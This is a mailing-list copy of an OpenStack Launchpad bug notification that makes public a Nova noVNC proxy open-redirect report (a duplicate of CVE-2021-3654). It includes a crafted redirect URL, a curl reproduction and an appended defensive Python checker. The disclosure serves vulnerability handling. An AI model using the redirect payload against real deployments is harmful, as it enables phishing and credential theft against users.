yahoo-eng-team team mailing list archive

[Bug 1988302] Re: novncproxy open redirect

 

*** This bug is a duplicate of bug 1927677 ***
    https://bugs.launchpad.net/bugs/1927677

That would be a question for the Ubuntu package maintainers, but we did
publish backports to the stable/train branch for that advisory and its
errata.

Thanks for confirming this is the same issue, I'll switch this report to
public and mark it as a duplicate of bug 1927677.

** Information type changed from Private Security to Public Security

** This bug has been marked a duplicate of bug 1927677
   [OSSA-2021-002] Open Redirect in noVNC proxy (CVE-2021-3654)

** Description changed:

- This issue is being treated as a potential security risk under
- embargo. Please do not make any public mention of embargoed
- (private) security vulnerabilities before their coordinated
- publication by the OpenStack Vulnerability Management Team in the
- form of an official OpenStack Security Advisory. This includes
- discussion of the bug or associated fixes in public forums such as
- mailing lists, code review systems and bug trackers. Please also
- avoid private disclosure to other individuals not already approved
- for access to this information, and provide this same reminder to
- those who are made aware of the issue prior to publication. All
- discussion should remain confined to this private bug report, and
- any proposed fixes should be added to the bug as attachments. This
- embargo shall not extend past 2022-11-29 and will be made
- public by or on that date even if no fix is identified.
- 
  Security Issue
  ==============
  
  We have found an open redirect vulnerability in Nova novncproxy
  
  Impact
  ======
  
  -  Attackers can serve malicious websites that steal passwords or download ransomware to their victims' machines due to a redirect and there are a heap of other attack vectors.
  - Attackers may be able to use this to execute believable phishing attacks, bypass authentication, or (in rare circumstances) violate CSRF mitigations.
  
  Steps to Reproduce
  ==================
  
  Simple curl the below url and it will redirect to google.com
  
  http://nova-novncproxy:6080////google.com/%2f%2e%2e
  
  Example
  =======
  
  $ curl "http://nova-novncproxy:6080////google.com/%2f.."; -v
  *   Trying 10.X.Y.Z...
  * TCP_NODELAY set
  * Connected to nova-novncproxy (10.X.Y.Z) port 6080 (#0)
  > GET ////google.com/%2f.. HTTP/1.1
  > Host: nova-novncproxy:6080
  > User-Agent: curl/7.58.0
  > Accept: */*
  >
  < HTTP/1.1 301 Moved Permanently
  < Server: WebSockify Python/3.6.9
  < Date: Wed, 31 Aug 2022 11:59:29 GMT
  < Location: //google.com/%2f../
  
  Reference
  =========
  
  https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1988302

Title:
  novncproxy open redirect

Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Incomplete

Bug description:
  Security Issue
  ==============

  We have found an open redirect vulnerability in Nova novncproxy

  Impact
  ======

  - Attackers can serve malicious websites that steal passwords or download ransomware to their victims' machines due to a redirect and there are a heap of other attack vectors.
  - Attackers may be able to use this to execute believable phishing attacks, bypass authentication, or (in rare circumstances) violate CSRF mitigations.

  Steps to Reproduce
  ==================

  Simply curl the URL below and it will redirect to google.com

  http://nova-novncproxy:6080////google.com/%2f%2e%2e

  Example
  =======

  $ curl "http://nova-novncproxy:6080////google.com/%2f.." -v
  *   Trying 10.X.Y.Z...
  * TCP_NODELAY set
  * Connected to nova-novncproxy (10.X.Y.Z) port 6080 (#0)
  > GET ////google.com/%2f.. HTTP/1.1
  > Host: nova-novncproxy:6080
  > User-Agent: curl/7.58.0
  > Accept: */*
  >
  < HTTP/1.1 301 Moved Permanently
  < Server: WebSockify Python/3.6.9
  < Date: Wed, 31 Aug 2022 11:59:29 GMT
  < Location: //google.com/%2f../

  Reference
  =========

  https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1988302/+subscriptions
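
Added example, not part of the original report and not nova or websockify code: a defender-side check that flags a redirect whose Location a browser would resolve to a different host (as in the curl transcript above), plus a guard that refuses request targets starting with "//" before a trailing-slash redirect is built. The function names and the "/app" rows are hypothetical and constructed for illustration.

```python
from typing import Optional, Tuple
from urllib.parse import urlsplit


def redirect_leaves_host(location: str, request_host: str) -> bool:
    """True if a browser following `location` would leave `request_host`."""
    # Browsers ignore surrounding whitespace and treat "\" like "/".
    parts = urlsplit(location.strip().replace("\\", "/"))
    # A non-empty netloc means an absolute ("http://h/") or
    # protocol-relative ("//h/") target rather than a same-host path.
    return bool(parts.netloc) and parts.netloc.lower() != request_host.lower()


def guarded_slash_redirect(request_target: str) -> Tuple[int, Optional[str]]:
    """Trailing-slash redirect that refuses targets starting with '//'.

    Returns (status, Location). Hypothetical helper for this example.
    """
    if request_target.replace("\\", "/").startswith("//"):
        return 400, None
    path, sep, query = request_target.partition("?")
    return 301, path + "/" + sep + query


# Constructed samples: (request target, Host header, Location returned).
# The first row is the exchange shown in the report's curl transcript.
SAMPLES = [
    ("////google.com/%2f..", "nova-novncproxy:6080", "//google.com/%2f../"),
    ("/app", "nova-novncproxy:6080", "/app/"),
    ("/app", "nova-novncproxy:6080", "http://nova-novncproxy:6080/app/"),
]


def audit(samples):
    """Return the request targets whose redirect leaves the requested host."""
    return [t for t, host, loc in samples if redirect_leaves_host(loc, host)]


if __name__ == "__main__":
    for target in audit(SAMPLES):
        print("off-host redirect for request target:", target)
    print(guarded_slash_redirect("////google.com/%2f.."))
    print(guarded_slash_redirect("/app"))
```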